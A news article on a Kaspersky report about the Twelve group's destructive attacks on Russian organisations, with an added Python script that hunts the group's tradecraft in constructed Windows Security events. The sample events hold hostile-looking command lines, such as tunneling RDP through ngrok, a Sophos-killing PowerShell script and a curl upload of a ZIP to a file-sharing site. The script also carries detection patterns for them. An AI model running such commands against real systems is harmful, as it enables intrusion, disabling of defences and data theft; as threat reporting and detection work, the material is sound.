A hacking group known as the Twelve has been seen using an arsenal of publicly available tools to launch destructive cyberattacks against Russian targets.
“Instead of demanding a ransom for data decryption, Twelve prefers to encrypt victims’ data and then wipe out their infrastructure to prevent recovery,” Kaspersky said in an analysis published Friday.
“This approach indicates a desire to cause maximum damage to target organizations without receiving direct financial benefit.”
The hacking group, believed to have been formed in April 2023 after the start of the Russo-Ukrainian war, has a track record of escalating cyber attacks aimed at crippling victims’ networks and disrupting business operations.
It has also been observed conducting hack-and-leak operations, publishing stolen sensitive information on its Telegram channel.
Kaspersky said Twelve shares infrastructure and tactical overlaps with a ransomware group called DARKSTAR (aka COMET or Shadow), raising the possibility that the two sets of intrusions are related to each other or part of the same activity cluster.
“At the same time, while Twelve’s actions are clearly hacker-like, DARKSTAR is following a classic double extortion scheme,” the Russian cybersecurity vendor said. “These variations in targets within the syndicate highlight the complexity and diversity of today’s cyber threats.”
Attack chains begin with initial access obtained by abusing valid local or domain accounts, after which Remote Desktop Protocol (RDP) is used for lateral movement. Some attacks are also carried out through the victim’s contractors.
“To do this, they gained access to the contractor’s infrastructure and then used its certificate to connect to their client’s VPN,” Kaspersky noted. “Once this is accessed, an adversary can connect to the customer’s systems via Remote Desktop Protocol (RDP) and then infiltrate the customer’s infrastructure.”
Other tools Twelve uses include Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation. Malicious RDP connections to the system are tunneled through ngrok.
PHP web shells with the ability to execute arbitrary commands, move files, or send emails are also deployed. These programs, such as WSO Web Shell, are readily available on GitHub.
In one incident investigated by Kaspersky, the threat actors exploited known vulnerabilities in VMware vCenter (CVE-2021-21972 and CVE-2021-22005) to deliver a web shell, which was then used to drop a backdoor called FaceFish.
“To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (access control lists) for Active Directory objects,” the report said. “To avoid detection, attackers have disguised their malicious programs and tasks under the names of existing products or services.”
Some of the names used include “Update Microsoft”, “Yandex”, “YandexUpdate” and “intel.exe”.
The attacks are also characterized by the use of a PowerShell script (“Sophos_kill_local.ps1”) to kill processes related to the Sophos security software on the compromised host.
The final steps involve using the Windows Task Scheduler to launch the ransomware and wiper payloads, but not before collecting and exfiltrating the victims’ sensitive information as ZIP archives via a file-sharing service called DropMeFiles.
“The attackers used a version of LockBit 3.0 ransomware, compiled from publicly available source code, to encrypt data,” Kaspersky researchers said. “Before starting, the ransomware terminates processes that could interfere with the encryption of individual files.”
The wiper, identical to the Shamoon malware, rewrites the Master Boot Record (MBR) on attached drives and overwrites all file contents with randomly generated bytes, effectively preventing system recovery.
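The tradecraft in the preceding paragraphs (tasks and binaries named after real products, the Sophos_kill_local.ps1 script, RDP tunneled through ngrok, domain group and ACL changes made with PowerShell, ZIP exfiltration via DropMeFiles) leaves traces in standard Windows Security events that a defender can hunt over. The script below is an added example written for this page, not Kaspersky’s tooling or anything taken from the report. The event records are constructed by hand to look like parsed Security log entries; the event IDs used (4698 task created, 4688 process created, 4728/4732/4756 group membership added, 5136 directory object modified) are the standard Windows ones, while the “vendor-named binary running outside a vendor path” heuristic and the privileged-group list are assumptions of the example rather than indicators stated in the report.

```python
"""Hunting rules for the Twelve TTPs described above, run over constructed Security events.

Added example, not code from Kaspersky or the article. Lure names, the Sophos kill
script, ngrok, DropMeFiles and the nTSecurityDescriptor (ACL) changes come from the
article; the trusted-path heuristic and privileged-group list are this example's own
assumptions.
"""
import re

# Task/process names the article says Twelve used to blend in.
LURE_NAMES = {"update microsoft", "yandex", "yandexupdate", "intel.exe"}
# Assumption: legitimate vendor binaries live under these roots; a vendor-named task
# whose action runs from anywhere else is treated as masquerading.
TRUSTED_ROOTS = (r"c:\program files", r"c:\program files (x86)", r"c:\windows\system32")
VENDOR_WORDS = ("microsoft", "yandex", "intel")
# Assumption: membership additions to these groups are worth an alert on their own.
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "administrators", "schema admins"}


def masquerading_task(name: str, image: str) -> bool:
    """True if a scheduled task name imitates a product but runs from an untrusted path."""
    n, img = name.lower(), image.lower()
    looks_like_vendor = n in LURE_NAMES or any(w in n for w in VENDOR_WORDS)
    return looks_like_vendor and not img.startswith(TRUSTED_ROOTS)


def hunt(events):
    """Apply each rule to a list of event dicts and return (rule, detail) findings."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 4698 and masquerading_task(ev["TaskName"], ev["Command"]):
            findings.append(("masquerading_task", f'{ev["TaskName"]} -> {ev["Command"]}'))
        elif eid == 4688:
            cmd = ev.get("CommandLine", "").lower()
            proc = ev["NewProcessName"].lower()
            # Script that kills Sophos processes, or an equivalent inline Stop-Process.
            if "sophos_kill_local.ps1" in cmd or re.search(r"stop-process.*sophos", cmd):
                findings.append(("av_tampering", cmd))
            # ngrok binary, or any tunnel publishing the RDP port.
            if proc.endswith("ngrok.exe") or " tcp 3389" in cmd:
                findings.append(("rdp_tunnel", cmd))
            if "dropmefiles" in cmd:
                findings.append(("exfil_dropmefiles", cmd))
        elif eid in (4728, 4732, 4756) and ev["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            findings.append(("privileged_group_add", f'{ev["MemberName"]} -> {ev["TargetUserName"]}'))
        elif eid == 5136 and ev["AttributeLDAPDisplayName"].lower() == "ntsecuritydescriptor":
            findings.append(("ad_acl_modified", ev["ObjectDN"]))
    return findings


# Constructed sample events (not real log data). The second task and the last 5136
# event are benign and must not be flagged.
SAMPLE_EVENTS = [
    {"EventID": 4698, "TaskName": "YandexUpdate", "Command": r"C:\Users\Public\intel.exe"},
    {"EventID": 4698, "TaskName": "MicrosoftEdgeUpdateTaskMachineCore",
     "Command": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Temp\Sophos_kill_local.ps1"},
    {"EventID": 4688, "NewProcessName": r"C:\Users\Public\ngrok.exe", "CommandLine": "ngrok.exe tcp 3389"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -F file=@C:\Temp\docs.zip https://dropmefiles.com/"},
    {"EventID": 4728, "MemberName": "CN=svc_backup,CN=Users,DC=corp,DC=local",
     "TargetUserName": "Domain Admins"},
    {"EventID": 5136, "ObjectDN": "CN=AdminSDHolder,CN=System,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 5136, "ObjectDN": "CN=jdoe,CN=Users,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "description"},
]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Run against the sample set, the script reports six findings and stays silent on the legitimate Edge update task and the unrelated directory change. In production the same rules would be fed from the Security log (4688 needs command-line auditing enabled, and 5136 needs a SACL on the AD objects of interest), and the trusted-path list would be tuned to the environment.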
“The group sticks to a publicly available and familiar arsenal of malicious tools, which suggests that it does not make its own,” Kaspersky noted. “This allows for early detection and prevention of Twelve attacks.”